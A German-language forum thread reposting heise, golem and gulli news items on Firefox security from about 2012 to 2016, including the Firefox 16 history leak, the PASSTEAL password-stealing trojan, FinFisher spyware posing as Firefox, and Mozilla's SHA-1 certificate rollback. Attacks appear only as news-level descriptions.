Eigentlich soll ein Anwender beim Surfen im privaten Modus von Firefox keine Spuren auf dem PC hinterlassen. Offenbar hat jedoch die kürzliche veröffentlichte Version 15 einen Fehler in dieser Funktion eingebaut, denn die Entwickler reichten jetzt 15.0.1 nach.
Der ganze Artikel (http://www.heise.de/newsticker/meldung/Firefox-Update-schliesst-Luecke-im-privaten-Modus-1702571.html)
Quelle : www.heise.de
-
Eine Sicherheitslücke in Firefox 16 (http://blog.mozilla.org/security/2012/10/10/security-vulnerability-in-firefox-16/) hat Mozilla in Alarmbereitschaft versetzt. Als Reaktion wurde Firefox 16 von der Mozilla Homepage entfernt und steht nicht mehr zur Installation zur Verfügung. Nutzer, die bereits Firefox 16 in Betrieb haben, können als Vorsichtsmaßnahme ein Downgrade auf die nicht betroffene Version 15.0.1 durchführen.
Die Sicherheitslücke in Firefox 16 kann einer bösartigen Seite erlauben, Einsicht in die Surf-Chronik von Nutzern zu nehmen; also die besuchten URLs auszulesen. Bisher gibt es keine Hinweise darauf, dass die Lücke bereits aktiv ausgenutzt wurde.
Einen Patch für die Schwachstelle plant Mozilla für den 11.10. – allerdings wahrscheinlich nach amerikanischer Zeit.
Quelle : www.heise.de
-
Gilt das auch für die 16:ner Beta-Version :hmm
-
Gilt das auch für die 16:ner Beta-Version :hmm
Höchstwahrscheinlich.
Inzwischen ist aber als Fix die 16.0.1 raus, auch als Online-Update.
-
Jo, bis gestern hatte ich noch die 15.1 drauf, heute morgen kam das update auf die 16.01 (16.0 gleich übersprungen). Gruß Ritschie
Mozilla hat wie angekündigt eine korrigierte Version von Firefox 16 veröffentlicht. Zuvor hatte Mozilla Firefox 16 zurückgezogen, da Angreifer die besuchten URLs eines Nutzers auslesen konnten.
Der Fehler betrifft neben Firefox 16 auch die Langzeitversion Firefox 10 ESR, bei der der Fehler in der neuen Version 10.0.9 korrigiert ist, sowie Thunderbird und Seamonkey, die ebenfalls beide in neuen Versionen erschienen sind.
Quelle: www.golem.de
-
Laut Trend Micro kursiert auf Warez-Seiten und im BitTorrent-Netz derzeit der Trojaner PASSTEAL, der den gesamten Passwortspeicher des Browsers ausliest und an Cyber-Ganoven überträgt. Der Schädling soll sich in Raubkopien von Programme und eBooks verstecken.
Beim Auslesen der Zugangsdaten macht es sich PASSTEAL leicht: Laut dem Bericht missbraucht der Trojaner hierzu unter anderem das kostenlose Windows-Tool WebBrowserPassView, welches eigentlich absolut harmlos ist, solange man es nur dazu nutzt, die eigenen Zugangsdaten aus dem Browser zu retten. Das Programm unterstützt alle gängigen Browser. Wer wissen will, was es auf dem eigenen Rechner zu holen gibt, kann das mit dem Tool schnell überprüfen.
Indem man in Firefox und Opera ein Master-Passwort setzt, macht man es Angreifern etwas schwerer, die im Browser gespeicherten Zugangsdaten auszulesen; Google Chrome und IE bieten diese Option nicht. Das Master-Passwort schützt zwar vor PASSTEAL, nicht aber davor, dass ein Angreifer mit einer anderen Malware zunächst die verschlüsselte Passwort-Datenbank und anschließend mit einem Keylogger auch noch das dazugehörige Master-Passwort abgreift. Das Gleiche gilt beim Einsatz eigenständiger Passwort-Manager wie KeePass.
Da man sich die Malware, die den Rechner befällt, nicht aussuchen kann, sollte man sich also gut überlegen, ob man überhaupt Zugangsdaten auf dem Rechner speichert. Eine trojaner-sichere Alternative ist ein Zettel, den man in der Geldböse oder im Tresor aufbewahrt.
Quelle : www.heise.de
-
Seit rund 19 Monaten arbeitet Mozilla an einer neuen Version des Modus "privates Surfen" für Firefox. Damit soll es nicht länger notwendig sein, die gesamte Browsersession zu beenden, nur um in einem Fenster den Modus zu nutzen. Andere Browser bieten das schon länger, in einer der kommenden Versionen von Firefox soll der neue Code integriert werden. Er kann ab sofort in den aktuellen Nightly Builds von Firefox getestet werden.
Damit ist es dann möglich, ein neues Fenster im privaten Modus zu öffnen, ohne dass die übrigen Fenster davon beeinflusst werden. Das Ganze lässt sich direkt über das Kontextmenü mit einem Rechtsklick auf einen Link einleiten.
Der ganze Artikel (http://www.golem.de/news/firefox-mozilla-verbessert-privates-surfen-1212-96298.html)
Quelle: www.golem.de
-
Ein Mechanismus, mit dem der freie Browser Firefox das heimliche Installieren von Add-ons verhindern will, lässt sich unter bestimmten Umständen aushebeln. Das beschreibt Julien Sobrier in einem Blog-Beitrag der Sicherheitsfirma Zscaler Research. Die Lücke lässt sich jedoch nur durch ein Programm ausnutzen, das ohnehin Schreibzugriff auf das Profile-Verzeichnis des Firefox hat. In der Regel dürfte es dann auch andere Benutzerdaten zumindest lesen können.
Sobrier erwähnt als Beispiel für das Verfahren Programme, die eine Toolbar im Browser installieren. Sie kopieren das Add-on in das Profile-Verzeichnis, und beim nächsten Neustart bittet Firefox den Benutzer um Zustimmung zur Installation. Dazu verlässt er sich auf die Datenbank extensions.sqlite: Deren Tabelle addon enthält alle bereits installierten und vom Benutzer gebilligten Erweiterungen.
Der ganze Artikel (http://www.heise.de/security/meldung/Firefox-Erweiterungen-lassen-sich-heimlich-installieren-1786710.html)
Quelle : www.heise.de
-
Mozilla hat das Überwachungssoftware-Unternehmen Gamma International abgemahnt. Der Grund: Gammas Spionage-Software FinFisher/FinSpy - die auch von der deutschen Bundesregierung als neuer "Staatstrojaner" angekauft wurde - maskiert sich, um einer Entdeckung zu entgegen, mitunter als Mozillas Firefox-Browser. Darin sieht Mozilla einen Missbrauch seiner Marke, gegen den das Projekt nun vorgeht.
Mozilla hat das Überwachungssoftware-Unternehmen Gamma International abgemahnt. Der Grund: Gammas Spionage-Software FinFisher - die auch von der deutschen Bundesregierung als neuer "Staatstrojaner" angekauft wurde - maskiert sich, um einer Entdeckung zu entgegen, mitunter als Mozillas Firefox-Browser.
Anlass für den Schritt Mozillas war ein Bericht der Bürgerrechts-Gruppe "Citizen Lab", in dem es heißt, Gammas Spionage-Software sei darauf programmiert, sich als Firefox auszugeben, um einer Entdeckung zu entgegen. Mozilla schickte Gamma daher am gestrigen Dienstag eine Abmahnung, in der die sofortige Unterlassung dieser, wie Mozilla betont, "illegalen Handlungen", gefordert wird.
Mozilla sei "ein Open-Source-Projekt, dem hunderte Millionen Menschen in aller Welt vertrauen", betonte die Stiftung in einem Blogeintrag, der die Hintergründe der Abmahnung erläutert. Der Schutz der eigenen Marken vor derartigem Missbrauch sei daher "sehr wichtig für unsere Marke, unsere Nutzer und den fortlaufenden Erfolg unserer Mission", betont Mozilla. Mozilla lege außerdem großen Wert auf Sicherheit und Datenschutz. Daher könnten die Projektverantwortlichen "es nicht ertragen, dass eine Software-Firma [Mozillas] Namen nutzt, um Online-Überwachungstools zu tarnen, die von Gammas Kunden genutzt werden können - und in einigen Fällen bereits genutzt wurden - um die Menschenrechte und Privatsphäre von Bürgern zu verletzen".
In seinem Blogeintrag betont Mozilla auch, dass die Spyware den eigentlichen Firefox-Browser weder bei der Installation noch im Betrieb beeinflusst. Die Gamma-Softwre sei "vollkommen separat" und nutze lediglich Mozillas Markennamen, um "als eine ihrer Methoden zum Verhindern von Entdeckung und Löschung zu lügen und zu täuschen". So sei die ausführbare Datei des Trojaners in den Eigenschaften als "Firefox.exe" benannt und enthalte auch entsprechende Hersteller-Informationen. Im Quellcode sei zudem das "Assembly Manifest" von Firefox 1:1 kopiert und eingefügt worden.
Ciizen Lab weiß von mindestens drei Fällen zu berichten, in denen eine derartige Täuschung geschah: einem Spyware-Angriff gegen pro-demokratische Aktivisten in Bahrain, Spionage-Aktivitäten im Umfeld der bevorstehenden Parlamentswahlen in Malaysia und einem von Gamma produzierten Demo-Video, mit dem die Spionage-Software beworben wird.
Eine Stellungnahme von Gamma International zu der Abmahnung liegt noch nicht vor.
Quelle : www.gulli.com
-
Die Mozilla Foundation ruft unabhängige Sicherheitsexperten zur regelmäßigen Kontrollen des Firefox-Quellcodes und verifizierter Builds auf. Hintergrund ist die durch die NSA-Enthüllungen publik gewordene, nahezu umfassende Überwachung aller digitalen Kommunikationskanäle. Mozillas Cheftechniker Brendan Eich und Andreas Gal, Vice President für Forschung und Entwicklung, greifen dabei in einem Blogbeitrag den Vorwurf auf, dass Hersteller von den Behörden gezwungen werden, Hintertüren für die Spionage in ihre Produkte zu integrieren.
Prinzipiell stehe hinter jedem Browser ein Unternehmen oder eine Organisation, die von Behörden derart in die Pflicht genommen werden können, erklären Eich und Gal. Auch wenn sie von keinem entsprechenden Fall wüssten, könnten Knebelerlasse im Hintergrund dafür sorgen, dass die Hersteller schweigen müssten und die Öffentlichkeit folglich nichts erfahre. Dementsprechend dürfe der Nutzer auch nicht blind einem Anbieter vertrauen.
Mozillas Firefox habe aber den Vorteil, hundert Prozent Open Source und damit anders als proprietäre Angebote überprüfbar zu sein. So könnten Sicherheitsexperten den Firefox-Quellcode regelmäßig prüfen und den von ihnen selbst daraus erzeugten Binärcode mit dem von Mozilla verteilten vergleichen. Durch Zusammenarbeit mit verschiedenen unabhängigen Stellen, die so regelmäßig auditierten, könne ein weltweites Prüfsystem etabliert werden, das mehr für Sicherheit sorge. Sollten Unregelmäßigkeiten auftauchen, könnte die Öffentlichkeit alarmiert werden. Die Frage, wie dabei mit Firefox-Addons umgegangen werden soll, schneiden die beiden Autoren nicht an.
Quelle : www.heise.de
-
Einige Sicherheits-Appliances, die Man-in-the-Middle-Analysen durchführen, kommen nicht damit klar, dass Firefox ab dem 1. Januar SHA-1-Zertifikate ablehnt. Darum hat Mozilla SHA-1 fürs erste wieder für akzeptabel erklärt.
Am 1. Januar hat Firefox planmäßig damit angefangen, die als unsicher geltenden SHA-1-Zertifikate zurückzuweisen. Da dies bei einigen Nutzern zu Problemen geführt hat, macht Mozilla diesen Schritt nun mit einem neuen Firefox-Update wieder rückgängig. Die Entwickler wollen SHA-1 nach wie vor ausmustern, allerdings wurde ein erneuter Versuch erst einmal auf unbestimmte Zeit vertagt.
Auslöser für den Rückzieher sind laut Mozilla Sicherheits-Produkte, die Man-in-the-Middle-Entschlüsselung durchführen. Darunter Web-Filter und Anti-Viren-Software, die verschlüsselten SSL-Traffic aufmachen muss, um den Inhalt zu untersuchen. Viele Produkte kommen offensichtlich nicht damit klar, dass der Browser die von ihnen verteilten SHA-1-Zertifikate nicht akzeptiert. Darunter sind auch die Web-Interfaces einiger Home-Router. Laut Mozilla arbeiten viele der Hersteller daran, das Problem in ihren Geräten zu lösen. Bis diese Probleme für viele Nutzer behoben sind wolle man deswegen weiterhin SHA-1 erlauben.
Wer nicht mehr surfen kann, braucht das Firefox-Update
Nutzer, die mit Firefox seit dem 1. Januar nicht mehr surfen können, sollten die neueste Firefox-Version installieren. Das klappt allerdings nicht aus dem betroffenen Netz, da auch Firefox-Updates über SSL verteilt werden. Als Workaround kann man auch den Wert security.pki.sha1_enforcement_level im about:config-Dialog des Browsers auf 0 setzen.
Bereits im Dezember hatten Facebook und Cloudflare zu bedenken gegeben, dass ein generelles SHA-1-Verbot Probleme für manche Nutzer bereiten könnte. Denn auch in Entwicklungsländern gibt es noch viele Geräte, die mit SHA-1 nicht klar kommen. Microsoft will SHA-1 zum 1. Januar 2017 in Rente schicken.
Quelle : www.heise.de